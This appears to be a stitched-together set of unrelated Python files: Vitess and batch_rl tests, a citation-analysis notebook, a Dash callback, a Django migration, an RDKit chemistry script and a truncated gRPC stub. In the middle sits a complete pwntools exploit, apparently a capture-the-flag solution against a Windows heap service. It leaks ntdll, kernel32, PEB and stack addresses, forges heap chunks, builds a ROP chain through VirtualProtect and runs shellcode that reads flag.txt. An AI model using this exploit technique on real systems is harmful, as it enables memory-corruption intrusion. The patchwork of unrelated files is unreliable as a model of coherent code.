utils.run_vtctl(['MigrateServedTypes', 'test_keyspace/0', 'master'],
expect_fail=True)
# now serve rdonly from the split shards
utils.run_vtctl(['MigrateServedTypes', 'test_keyspace/0', 'rdonly'],
auto_log=True)
utils.check_srv_keyspace('test_nj', 'test_keyspace',
'Partitions(master): -\n'
'Partitions(rdonly): -80 80-\n'
'Partitions(replica): -\n',
keyspace_id_type=base_sharding.keyspace_id_type,
sharding_column_name='custom_ksid_col')
# make sure rdonly tablets are back to serving before hitting vtgate.
for t in [shard_0_rdonly1, shard_1_rdonly1]:
t.wait_for_vttablet_state('SERVING')
utils.vtgate.wait_for_endpoints('test_keyspace.-80.rdonly', 1)
utils.vtgate.wait_for_endpoints('test_keyspace.80-.rdonly', 1)
# check the Map Reduce API works correctly, should use ExecuteKeyRanges
# on both destination shards now.
# we ask for 2 splits to only have one per shard
sql = 'select id, msg from resharding1'
timeout = 10.0
while True:
try:
s = utils.vtgate.split_query(sql, 'test_keyspace', 2)
break
except Exception: # pylint: disable=broad-except
timeout = utils.wait_step(
'vtgate executes split_query properly', timeout)
self.assertEqual(len(s), 2)
self.assertEqual(s[0]['key_range_part']['keyspace'], 'test_keyspace')
self.assertEqual(s[1]['key_range_part']['keyspace'], 'test_keyspace')
self.assertEqual(len(s[0]['key_range_part']['key_ranges']), 1)
self.assertEqual(len(s[1]['key_range_part']['key_ranges']), 1)
# then serve replica from the split shards
source_tablet = shard_replica
destination_tablets = [shard_0_replica, shard_1_replica]
utils.run_vtctl(
['MigrateServedTypes', 'test_keyspace/0', 'replica'], auto_log=True)
utils.check_srv_keyspace('test_nj', 'test_keyspace',
'Partitions(master): -\n'
'Partitions(rdonly): -80 80-\n'
'Partitions(replica): -80 80-\n',
keyspace_id_type=base_sharding.keyspace_id_type,
sharding_column_name='custom_ksid_col')
# move replica back and forth
utils.run_vtctl(
['MigrateServedTypes', '-reverse', 'test_keyspace/0', 'replica'],
auto_log=True)
# After a backwards migration, queryservice should be enabled on
# source and disabled on destinations
utils.check_tablet_query_service(self, source_tablet, True, False)
utils.check_tablet_query_services(self, destination_tablets, False, True)
utils.check_srv_keyspace('test_nj', 'test_keyspace',
'Partitions(master): -\n'
'Partitions(rdonly): -80 80-\n'
'Partitions(replica): -\n',
keyspace_id_type=base_sharding.keyspace_id_type,
sharding_column_name='custom_ksid_col')
utils.run_vtctl(['MigrateServedTypes', 'test_keyspace/0', 'replica'],
auto_log=True)
# After a forwards migration, queryservice should be disabled on
# source and enabled on destinations
utils.check_tablet_query_service(self, source_tablet, False, True)
utils.check_tablet_query_services(self, destination_tablets, True, False)
utils.check_srv_keyspace('test_nj', 'test_keyspace',
'Partitions(master): -\n'
'Partitions(rdonly): -80 80-\n'
'Partitions(replica): -80 80-\n',
keyspace_id_type=base_sharding.keyspace_id_type,
sharding_column_name='custom_ksid_col')
# then serve master from the split shards
utils.run_vtctl(['MigrateServedTypes', 'test_keyspace/0', 'master'],
auto_log=True)
utils.check_srv_keyspace('test_nj', 'test_keyspace',
'Partitions(master): -80 80-\n'
'Partitions(rdonly): -80 80-\n'
'Partitions(replica): -80 80-\n',
keyspace_id_type=base_sharding.keyspace_id_type,
sharding_column_name='custom_ksid_col')
# check the binlog players are gone now
self.check_no_binlog_player(shard_0_master)
self.check_no_binlog_player(shard_1_master)
# make sure we can't delete a shard with tablets
utils.run_vtctl(['DeleteShard', 'test_keyspace/0'], expect_fail=True)
# remove the original tablets in the original shard
tablet.kill_tablets([shard_master, shard_replica, shard_rdonly1])
for t in [shard_replica, shard_rdonly1]:
utils.run_vtctl(['DeleteTablet', t.tablet_alias], auto_log=True)
utils.run_vtctl(['DeleteTablet', '-allow_master',
shard_master.tablet_alias], auto_log=True)
# rebuild the serving graph, all mentions of the old shards shoud be gone
utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True)
# delete the original shard
utils.run_vtctl(['DeleteShard', 'test_keyspace/0'], auto_log=True)
# kill everything else
tablet.kill_tablets([shard_0_master, shard_0_replica, shard_0_rdonly1,
shard_1_master, shard_1_replica, shard_1_rdonly1])
if __name__ == '__main__':
utils.main()
|
import unittest
from logic.car import Car
class TestCar(unittest.TestCase):
def setUp(self):
self.car_obj = Car()
def test_reg_no(self):
self.car_obj.reg_no = "1234"
self.assertEqual(self.car_obj.reg_no, "1234")
def test_colour(self):
self.car_obj.colour = "red"
self.assertEqual(self.car_obj.colour, "red")
if __name__ == '__main__':
unittest.main()
|
# %%
# Load libraries
import pandas as pd
import numpy as np
from bs4 import BeautifulSoup
import os
import re
import seaborn as sns
import matplotlib.pyplot as plt
# %%
# set plot styles
sns.set_style("darkgrid")
# %%
def load_docs(dir_path):
"""
- Parameters: dir_path (string) for a directory containing text files.
- Returns: A list of dictionaries with keys file_name and text.
"""
docs = []
for file_name in os.listdir(dir_path):
file_path = os.path.join(dir_path, file_name)
if file_name.endswith(".html") and os.path.isfile(file_path):
with open(file_path, "r+", encoding="utf-8") as file:
text = file.read()
current = {
"file_name": file_name,
"text": text
}
docs.append(current)
return docs
html_docs = load_docs("data")
html_docs = sorted(html_docs, key = lambda d: d["file_name"])
# %%
def extract_paper_data(paper):
"""
- Parameters: paper (BeautifulSoup object)
- Returns: A dictionary of paper attributes.
"""
title_anchor = paper.find("h3").find("a")
author_info = paper.find(class_="gs_a")
authors = author_info.text.split("-")[0].strip().split(", ")
year = "".join(re.findall(r' \d{4}', author_info.text))[-4:]
blurb = paper.find(class_="gs_rs")
usage_data = paper.find(class_="gs_fl")
citation_anchor = usage_data.find_all("a")[2]
num_cites = int("".join(re.findall(r'\d*', citation_anchor.text)))
return {
"title": title_anchor.text if title_anchor else "",
"authors": authors,
"blurb": blurb.text if blurb else "",
"citations": num_cites,
"year": int(year) if year != "" else "",
"link": title_anchor["href"] if title_anchor else ""
}
def paper_df(paper_html):
"""
- Parameters: paper_html (string of html text from a Google Scholar page)
- Returns: A Pandas DataFrame with data for each paper in paper_html
"""
paper_soup = BeautifulSoup(paper_html, "html.parser")
all_paper_data = []
results = paper_soup.find(id="gs_res_ccl_mid")
papers = results.find_all("div", class_="gs_ri")
for paper in papers:
paper_data = extract_paper_data(paper)
all_paper_data.append(paper_data)
return pd.DataFrame(all_paper_data)
def load_papers(html_docs):
"""
- Parameters: html_docs (a list of dictionaries with file_name and text keys)
- Returns: A Pandas DataFrame with data from each of the papers in html_docs
"""
all_dfs = []
for entry in html_docs:
df = paper_df(entry["text"])
all_dfs.append(df)
full_df = pd.concat(all_dfs).sort_values("citations", ascending=False)
full_df = full_df.reset_index(drop=True)
return full_df
def clean_papers(papers_df):
"""
- Parameters: papers_df (Pandas DataFrame)
- Returns: A dataframe with rows that contain empty cells removed.
"""
clean_df = papers_df.copy()
clean_df = clean_df.replace("", np.nan, regex=True)
clean_df = clean_df.dropna()
return clean_df
papers = load_papers(html_docs)
papers = clean_papers(papers)
# %%
# add citation_rate column
def get_citation_rate(citations, year_published):
"""
- Parameters: citations (int), year_published (int)
- Returns: The number of citations per year, since the year published.
"""
current_year = pd.datetime.now().year
years_since_publish = current_year - year_published
return citations / (years_since_publish + 1)
papers["citation_rate"] = get_citation_rate(papers["citations"], papers["year"])
papers = papers[["title", "authors", "blurb", "citations",
"citation_rate", "year", "link"]]
papers.head(10)
# %%
# prolific authors
def get_author_counts(papers_df):
"""
- Parameters: papers_df (Pandas DataFrame)
- Returns: A dataframe with a count of each author in pandas_df["authors"]
"""
authors = papers_df["authors"].apply(pd.Series).stack().reset_index(name="author")
authors = authors["author"]
author_counts = authors.value_counts()
author_counts = author_counts.rename_axis("author").reset_index(name="count")
author_counts = author_counts.sort_values(by=["count", "author"],
ascending=[False, True])
return author_counts
author_counts = get_author_counts(papers)
author_counts.head(10)
# %%
def filter_by_author(papers_df, author_name):
"""
- Parameters: papers_df (Pandas DataFrame), author_name (str)
- Returns: A dataframe with entries from papers_df by author.
"""
return papers_df[papers_df["authors"].apply(
lambda authors: author_name in authors)]
filter_by_author(papers, "C Friedman")
# %%
def get_author_citation_counts(papers_df):
"""
- Parameters: papers_df (Pandas DataFrame)
- Returns: A dataframe with a citation count for each author.
"""
df = papers_df.explode("authors")
df = df[["authors", "citations", "citation_rate"]]
author_citations = df.groupby("authors").sum()
author_citations = author_citations.reset_index()
return author_citations
author_citation_counts = get_author_citation_counts(papers)
author_citation_counts.head(10)
# %%
# plot top authors
def plot_counts(df, title, subtitle, x_col, x_lab, y_col="count", y_lab="Count"):
"""
- Parameters df (Pandas DataFrame), title (str), subtitle (str), x_col (str),
x_lab (str), y_col (str), y_lab (str)
- Plots a barplot of df using the provided x and y columns.
"""
fig, ax = plt.subplots(figsize=(7, 5))
sns.barplot(
x=x_col,
y=y_col,
data=df,
alpha=0.9,
ax=ax
)
ax.set(
xlabel=x_lab,
ylabel=y_lab,
)
ax.text(
x=0.5,
y=1.15,
s=title,
fontsize=16,
ha="center",
va="bottom",
transform=ax.transAxes
)
ax.text(
x=0.5,
y=1.05,
s=subtitle,
fontsize=14,
ha="center",
va="bottom",
transform=ax.transAxes
)
plt.xticks(rotation=90)
plt.show()
title = "Influential NLP Papers on Google Scholar"
subtitle = "Most Prolific Authors"
plot_counts(author_counts.head(10), title, subtitle, "author", "Author")
# %%
# citations by year
def get_yearly_citation_count(papers_df):
"""
- Parameters: papers_df (Pandas DataFrame)
- Returns: A dataframe with a count of citations per year
"""
counts = papers_df.groupby("year").sum()
counts = counts.reset_index()
counts["citation_rate"] = get_citation_rate(counts["citations"], counts["year"])
return counts
yearly_citations = get_yearly_citation_count(papers)
# %%
# plot yearly citations
def plot_citations_by_year(df, title, subtitle, year_col="year"):
"""
- Parameters df (Pandas DataFrame), title (str), subtitle (str), year_col (str)
- Plots a scatterplot of the count of citations and citation_rate in df by year.
"""
fig, (ax0, ax1) = plt.subplots(figsize=(7, 11), nrows=2, ncols=1)
# total citations
sns.scatterplot(
x="year",
y="citations",
data=df,
alpha=0.7,
color="navy",
ax=ax0
)
ax0.set(
xlabel="Year",
ylabel="Total citations",
title="Total citations, per year"
)
# total citation rate
sns.scatterplot(
x="year",
y="citation_rate",
data=df,
alpha=0.7,
color="teal",
ax=ax1
)
ax1.set(
xlabel="Year",
ylabel="Citations per year",
title="Citation rate, by year"
)
# titles
ax0.text(
x=0.5,
y=1.20,
s=title,
fontsize=16,
ha="center",
va="bottom",
transform=ax0.transAxes
)
ax0.text(
x=0.5,
y=1.10,
s=subtitle,
fontsize=14,
ha="center",
va="bottom",
transform=ax0.transAxes
)
plt.show()
subtitle = "Citations and Citation Rate by Year"
plot_citations_by_year(papers, title, subtitle)
# %%
# top papers by citation
def top_papers_by_col(papers_df, sort_col, limit=10):
"""
- Parameters: papers_df (Pandas DataFrame)
- Returns: A dataframe with [limit] entries based on the highest values for
sort_col in papers_df.
"""
df = papers_df.copy()
df = df.sort_values(by=sort_col, ascending=False)
return df.head(limit)
top_papers_by_col(papers, "citations")
# %%
# top papers by citation_rate
top_papers_by_col(papers, "citation_rate")
# %%
# up-and-coming papers
def filter_by_year(df, filter_year, year_col="year"):
"""
- Parameters: df (Pandas DataFrame), filter_year (int), year_col (str)
- Returns: A dataframe where year_col in df is filtered by year.
"""
return df[df[year_col] == filter_year]
top_papers_by_col(filter_by_year(papers, 2020), "citations")
# %%
# plot papers by year
def plot_count_by_year(df, title, subtitle, year_col="year"):
"""
- Parameters df (Pandas DataFrame), title (str), subtitle (str), year_col (str)
- Plots a scatterplot of the count of rows in df, grouped by year_col.
"""
counts = df.groupby(year_col).size().reset_index(name="count")
fig, ax = plt.subplots(figsize=(7, 5))
sns.scatterplot(
x="year",
y="count",
data=counts,
alpha=0.8,
ax=ax
)
ax.set(
xlabel="Year",
ylabel="Count",
)
ax.text(
x=0.5,
y=1.15,
s=title,
fontsize=16,
ha="center",
va="bottom",
transform=ax.transAxes
)
ax.text(
x=0.5,
y=1.05,
s=subtitle,
fontsize=14,
ha="center",
va="bottom",
transform=ax.transAxes
)
plt.xticks(rotation=90)
plt.show()
subtitle = "Papers by Year"
plot_count_by_year(papers, title, subtitle)
|
import dash_bootstrap_components as dbc
from dash import Input, Output, html
color_selector = html.Div(
[
html.Div("Select a colour theme:"),
dbc.Select(
id="change-table-color",
options=[
{"label": "primary", "value": "primary"},
{"label": "secondary", "value": "secondary"},
{"label": "success", "value": "success"},
{"label": "danger", "value": "danger"},
{"label": "warning", "value": "warning"},
{"label": "info", "value": "info"},
{"label": "light", "value": "light"},
{"label": "dark", "value": "dark"},
],
value="primary",
),
],
className="p-3 m-2 border",
)
table = html.Div(
[
color_selector,
dbc.Table(
# using the same table as in the above example
table_header + table_body,
id="table-color",
color="primary",
),
]
)
@app.callback(
Output("table-color", "color"), Input("change-table-color", "value")
)
def change_table_colour(color):
return color
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""End to end tests for FixedReplayRunner."""
import datetime
import os
import shutil
from absl import flags
from batch_rl.fixed_replay import train
import tensorflow.compat.v1 as tf
FLAGS = flags.FLAGS
class FixedReplayRunnerIntegrationTest(tf.test.TestCase):
"""Tests for Atari environment with various agents.
"""
def setUp(self):
super(FixedReplayRunnerIntegrationTest, self).setUp()
FLAGS.base_dir = os.path.join(
'/tmp/batch_rl_tests',
datetime.datetime.utcnow().strftime('run_%Y_%m_%d_%H_%M_%S'))
self._checkpoint_dir = os.path.join(FLAGS.base_dir, 'checkpoints')
self._logging_dir = os.path.join(FLAGS.base_dir, 'logs')
def quickFixedReplayREMFlags(self):
"""Assign flags for a quick run of FixedReplay agent."""
FLAGS.gin_bindings = [
"create_runner.schedule='continuous_train_and_eval'",
'FixedReplayRunner.training_steps=100',
'FixedReplayRunner.evaluation_steps=10',
'FixedReplayRunner.num_iterations=1',
'FixedReplayRunner.max_steps_per_episode=100',
]
FLAGS.alsologtostderr = True
FLAGS.gin_files = ['batch_rl/fixed_replay/configs/rem.gin']
FLAGS.agent_name = 'multi_head_dqn'
def verifyFilesCreated(self, base_dir):
"""Verify that files have been created."""
# Check checkpoint files
self.assertTrue(
os.path.exists(os.path.join(self._checkpoint_dir, 'ckpt.0')))
self.assertTrue(
os.path.exists(os.path.join(self._checkpoint_dir, 'checkpoint')))
self.assertTrue(
os.path.exists(
os.path.join(self._checkpoint_dir,
'sentinel_checkpoint_complete.0')))
# Check log files
self.assertTrue(os.path.exists(os.path.join(self._logging_dir, 'log_0')))
def testIntegrationFixedReplayREM(self):
"""Test the FixedReplayMultiHeadDQN agent."""
assert FLAGS.replay_dir is not None, 'Please provide a replay directory'
tf.logging.info('####### Training the REM agent #####')
tf.logging.info('####### REM base_dir: {}'.format(FLAGS.base_dir))
tf.logging.info('####### replay_dir: {}'.format(FLAGS.replay_dir))
self.quickFixedReplayREMFlags()
train.main([])
self.verifyFilesCreated(FLAGS.base_dir)
shutil.rmtree(FLAGS.base_dir)
if __name__ == '__main__':
tf.test.main()
|
# Generated by Django 3.1.7 on 2021-02-25 09:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='item',
name='image',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='item',
name='label',
field=models.CharField(choices=[('new', 'New Product'), ('hot', 'Hot Product'), ('sale', 'Sale Product')], default='new', max_length=60),
),
]
|
print("Starting up...")
# import necessary libraries
from time import time
start = time()
import os
import argparse
import rdkit.Chem as Chem
from utils import *
from rdkit.Chem import AllChem
from pathlib import Path
import rdkit.Chem.rdchem as rdchem
import rdkit.Chem.Draw as Draw
import rdkit.Chem.Descriptors
from rdkit.Chem import PandasTools
from rdkit.Chem.Draw import MolsToGridImage
import pandas as pd
import numpy as np
import datamol as dm
print("Homologue classification started...")
# parse command line inputs
parser = argparse.ArgumentParser()
parser.add_argument("-in", "--input_csv", help="CSV containing SMILES and Name.")
parser.add_argument("-sep", "--separator", help="Delimiter for CSV file.")
parser.add_argument("-s", "--smiles", help="Name of column containing SMILES.", type=str)
parser.add_argument("-n", "--names", help="Name of column containing Names.", type=str)
parser.add_argument(
"-ru",
"--repeatingunits",
help="Repeating unit as SMARTS string enclosed by speech marks. Default is CH2 i.e., [#6&H2].",
type=str,
)
parser.add_argument(
"-min",
"--min_RU_in",
help="Minimum length of RU chain, default = 3 units.",
type=int,
)
parser.add_argument(
"-max",
"--max_RU_in",
help="Maximum length of RU chain, default = 30 units.",
type=int,
)
parser.add_argument(
"-f",
"--frag_in",
help="No. of fragmentation steps separating RU from core(s).",
type=int,
)
args = parser.parse_args()
if args.smiles:
smiles = args.smiles
else:
smiles = "SMILES" # set 'SMILES' as default column name for SMILES
if args.names:
names = args.names
else:
names = "Name" # set 'Name' as default column name for Names
if args.repeatingunits:
ru_in = args.repeatingunits + "-"
else:
ru_in = "[#6&H2]-" # set CH2 as default RU
if args.min_RU_in:
min_length = args.min_RU_in
else:
min_length = 3
if args.max_RU_in:
max_length = args.max_RU_in
else:
max_length = 30
if args.frag_in:
frag_steps = args.frag_in
else:
frag_steps = 2 # set fragmentation_steps default as 2
print("all args parsed OK")
# read in SMILES and labels
(
smiles,
mols,
smiles_torem,
idxtorem,
labels,
input_df,
df,
path_to_csv,
) = read_input_csv_smiles_name(args.input_csv, args.separator, smiles, names)
print("inputs parsed OK")
# enumerate repeating units
ru = setup_repeating_unit(ru_in, min_length, max_length)
print("ru setup OK")
# prepare output dir
Path("output").mkdir(parents=True, exist_ok=True)
print("output folder setup OK")
# remove unparseable SMILES, write to .txt
write_removed_smiles(smiles_torem)
# detect RUs in mols
(
mols_no_ru_matches,
labels_mols_no_ru_matches,
mols_with_ru,
labels_mols_with_ru,
) = detect_repeating_units(mols, labels, ru)
print("detect_repeating_units OK")
# fragmentation into patts and cores, done n times (n = frag_steps)
lists_patts, lists_cores, empty_cores_idx = fragment_into_cores(
mols_with_ru, ru, frag_steps
)
print("Done fragment_into_cores")
# detect and output molecules made solely of RUs
(
mols_made_of_ru,
labels_made_of_ru,
mols_to_classify,
labels_to_classify,
) = detect_mols_made_of_ru(mols_with_ru, labels_mols_with_ru, empty_cores_idx)
print("Done detect_mols_made_of_ru")
# remove mols with empty core objects
lists_patts, lists_cores = process_patts_cores(
lists_patts, lists_cores, empty_cores_idx
)
print("Done filtering out empty patts and cores")
# generate summary df
classified_series, result_df = generate_df(
lists_patts, lists_cores, mols_to_classify, labels_to_classify, df, mols_made_of_ru
)
print("Done generate_df")
# detect mols with unique cores i.e. don't form series
mols_nonseries, labs_nonseries, nonseries = detect_mols_nonseries(result_df)
print("Done detect_mols_nonseries")
# group molecules into series by unique canonical SMILES of cores
grpdmols = detect_cores_classified_series(classified_series)
print("Done detect_cores_classified_series")
# depict cores and legends
final_cores, leg_final_cores = depict_cores_summary(grpdmols)
print("Done depict_cores_summary")
# generate output CSV with series_no, calculated mf, inchis, inchikeys etc.
generate_classified_series_summary(result_df)
print("Done generate_classified_series_summary")
# generate output summary
num_series, mols_classified = print_output_summary(
result_df, nonseries, mols_no_ru_matches, mols_made_of_ru
)
end = time()
print(
"Homologue classification complete! "
+ str(mols_classified)
+ " molecules have been classified into "
+ str(num_series)
+ " series."
)
runtime = end - start
print("It took " + str(runtime) + " seconds.")
# output summary file
generate_output_summary(
mols_classified,
num_series,
ru_in,
mols_no_ru_matches,
nonseries,
mols_made_of_ru,
min_length,
max_length,
frag_steps,
runtime,
path_to_csv,
)
print("Classification summary generated.")
|
from pwn import *
import time
import sys
def add(key, size, data):
proc.sendlineafter(b'>>', b'1')
proc.sendlineafter(b':', key)
proc.sendlineafter(b':', f'{size}'.encode())
proc.sendafter(b':', data)
def view(key):
proc.sendlineafter(b'>>', b'2')
proc.sendlineafter(b':', key)
proc.recvuntil(b'Data:')
def remove(key):
proc.sendlineafter(b'>>', b'3')
proc.sendlineafter(b':', key)
def logout():
proc.sendlineafter(b'>>', b'4')
def login(name, password):
# login
proc.sendlineafter(b'>>', b'1')
proc.sendafter(b':', name)
proc.sendafter(b':', password)
def exploit():
if len(sys.argv) <= 1:
input('attach to pid: {}'.format(proc.proc.pid))
login(b'ddaa\n', b'phdphd\n')
for i in range(19):
add(f'LFH_{i}', 0x200, 'LFH')
for i in range(0x10):
add(f'fill_{i}', 0x200, 'LFH')
remove('fill_0')
add('fill_1', 0x60, 'AAAA')
view('fill_1')
# data + chunk header
proc.recv(0x60 + 0x10)
heap_base = u64(proc.recv(8)) & ~0xffff
size = u64(proc.recv(8))
next_node = proc.recvuntil(b'\x00')[:-1]
log.info('heap: ' + hex(heap_base))
lock = heap_base + 0x2c0
def leak(addr):
add(b'fill_1', 0x60, b'A' * 0x70 + p64(addr))
view(next_node)
return u64(proc.recv(8))
ntdll = leak(lock) - 0x163d10
log.info('ntdll: ' + hex(ntdll))
# 00000000`00163d10
program = leak(ntdll + 0x01652c8) - 0xf8
log.info('program: ' + hex(program))
peb = leak(ntdll + 0x1652e8) - 0x240
log.info('peb: ' + hex(peb))
stack = leak(peb + 0x1010)
log.info('stack: ' + hex(stack))
kernel32 = leak(program + 0x3000) - 0x22680
log.info('kernel32: ' + hex(kernel32))
process_parameter = leak(peb + 0x20)
stdin = leak(process_parameter + 0x20)
log.info('stdin:' + hex(stdin))
stdout = leak(process_parameter + 0x28)
log.info('stdout:' + hex(stdout))
target = program + 0x1e38
ret_addr = stack + 0x2000 + (0x100 * 8)
found = False
for i in range(0x1000 // 8):
print(i, hex(ret_addr))
if leak(ret_addr) == target:
print('Found return address')
found = True
break
ret_addr += 8
assert found
ret_addr -= 0x280
add(b'A', 0x440, b'AAAA' * 8)
add(b'A', 0x100, b'AAAA' * 8)
add(b'B', 0x100, b'BBBB' * 8)
add(b'C', 0x100, b'CCCC' * 8)
add(b'D', 0x100, b'DDDD' * 8)
remove(b'B')
remove(b'D')
view(b'A')
proc.recv(0x100)
fake_chunk_header = proc.recv(0x10)
B_flink = u64(proc.recv(8))
B_blink = u64(proc.recv(8))
proc.recv(0x100 + 0x110)
D_flink = u64(proc.recv(8))
D_blink = u64(proc.recv(8))
print(hex(B_flink), hex(B_blink))
print(hex(D_flink), hex(D_blink))
B_addr = D_blink
pass_adr = program + 0x5648
user_adr = program + 0x5620
add(b'A', 0x100, b'A' * 0x100 + fake_chunk_header + p64(pass_adr + 0x10))
logout()
# B->fake2(pass)->fake1(user)
fake2 = b'phdphd\x00'.ljust(8, b'\x00') + fake_chunk_header[8:]
fake2 += p64(user_adr + 0x10) + p64(D_blink)
fake1 = b'ddaa\x00'.ljust(8, b'\x00') + fake_chunk_header[8:]
fake1 += p64(D_flink) + p64(pass_adr + 0x10)
login(fake1, fake2)
cnt = 0
_ptr = 0
_base = ret_addr
flag = 0x2080
fd = 0
bufsize = 0x100+0x10
obj = p64(_ptr) + p64(_base) + p32(cnt) + p32(flag)
obj += p32(fd) + p32(0) + p64(bufsize) +p64(0)
obj += p64(0xffffffffffffffff) + p32(0xffffffff) + p32(0) + p64(0)*2
add(b'BBBB', 0x100, obj)
add(b'BSS', 0x100, b'S' * 0x10 + p64(B_addr))
logout()
input('a')
login(b'aaaa', b'aaaa')
pop_rdx_rcx_r8_r9_r10_r11 = ntdll + 0x8fb30
shellcode_addr = program + 0x5000
readfile = kernel32 + 0x22680
virtualprotect = kernel32 + 0x1b680
buf = flat(pop_rdx_rcx_r8_r9_r10_r11, shellcode_addr)
buf += flat(stdin, 0x100, shellcode_addr + 0x100, 10, 11, readfile)
buf += flat(pop_rdx_rcx_r8_r9_r10_r11, 0x1000, shellcode_addr)
buf += flat(0x40, ret_addr + 0x100 - 8, 0, 11)
buf += flat(virtualprotect, shellcode_addr)
proc.send(buf.ljust(0x100 - 8) + p64(0x4))
writefile = kernel32 + 0x22770
createfile = kernel32 + 0x222f0
shellcode = f'''
jmp readflag
flag:
pop r11
createfile:
mov qword ptr [rsp + 0x30], 0
mov qword ptr [rsp + 0x28], 0x80
mov qword ptr [rsp + 0x20], 3
xor r9, r9
mov r8, 1
mov rdx, 0x80000000
mov rcx, r11
mov rax, {createfile}
call rax
readfile:
mov qword ptr [rsp + 0x20], 0
lea r9, [rsp + 0x200]
mov r8, 0x100
lea rdx, [rsp + 0x100]
mov rcx, rax
mov rax, {readfile}
call rax
writefile:
mov qword ptr [rsp + 0x20], 0
lea r9, [rsp + 0x200]
mov r8, 0x100
lea rdx, [rsp + 0x100]
mov rcx, {stdout}
mov rax, {writefile}
call rax
loop:
jmp loop
readflag:
call flag
'''
shellcode = (asm(shellcode) + b'flag.txt\x00').ljust(0x100, b'\x90')
proc.send(shellcode)
if __name__ == '__main__':
context.arch = 'amd64'
connect = 'nc 192.168.9.1 4869'
connect = connect.split(' ')
if len(sys.argv) > 1:
proc = remote(connect[1], int(connect[2]))
else:
proc = process(['filename'], env={'LD_LIBRARY_PATH': './'})
exploit()
proc.interactive()
|
# Copyright (c) 2017-2023 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# fmt: off
# isort: skip_file
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from . import transaction_service_pb2 as com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2
class TransactionServiceStub(object):
"""Allows clients to read transactions from the ledger.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetTransactions = channel.unary_stream(
'/com.daml.ledger.api.v1.TransactionService/GetTransactions',
request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.SerializeToString,
response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsResponse.FromString,
)
self.GetTransactionTrees = channel.unary_stream(
'/com.daml.ledger.api.v1.TransactionService/GetTransactionTrees',
request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.SerializeToString,
response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionTreesResponse.FromString,
)
self.GetTransactionByEventId = channel.unary_unary(
'/com.daml.ledger.api.v1.TransactionService/GetTransactionByEventId',
request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.SerializeToString,
response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.FromString,
)
self.GetTransactionById = channel.unary_unary(
'/com.daml.ledger.api.v1.TransactionService/GetTransactionById',
request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.SerializeToString,
response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.FromString,
)
self.GetFlatTransactionByEventId = channel.unary_unary(
'/com.daml.ledger.api.v1.TransactionService/GetFlatTransactionByEventId',
request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.SerializeToString,
response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.FromString,
)
self.GetFlatTransactionById = channel.unary_unary(
'/com.daml.ledger.api.v1.TransactionService/GetFlatTransactionById',
request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.SerializeToString,
response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.FromString,
)
self.GetLedgerEnd = channel.unary_unary(
'/com.daml.ledger.api.v1.TransactionService/GetLedgerEnd',
request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndRequest.SerializeToString,
response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndResponse.FromString,
)
self.GetLatestPrunedOffsets = channel.unary_unary(
'/com.daml.ledger.api.v1.TransactionService/GetLatestPrunedOffsets',
request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsRequest.SerializeToString,
response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsResponse.FromString,
)
class TransactionServiceServicer(object):
"""Allows clients to read transactions from the ledger.
"""
def GetTransactions(self, request, context):
"""Read the ledger's filtered transaction stream for a set of parties.
Lists only creates and archives, but not other events.
Omits all events on transient contracts, i.e., contracts that were both created and archived in the same transaction.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTransactionTrees(self, request, context):
"""Read the ledger's complete transaction tree stream for a set of parties.
The stream can be filtered only by parties, but not templates (template filter must be empty).
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTransactionByEventId(self, request, context):
"""Lookup a transaction tree by the ID of an event that appears within it.
For looking up a transaction instead of a transaction tree, please see GetFlatTransactionByEventId
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTransactionById(self, request, context):
"""Lookup a transaction tree by its ID.
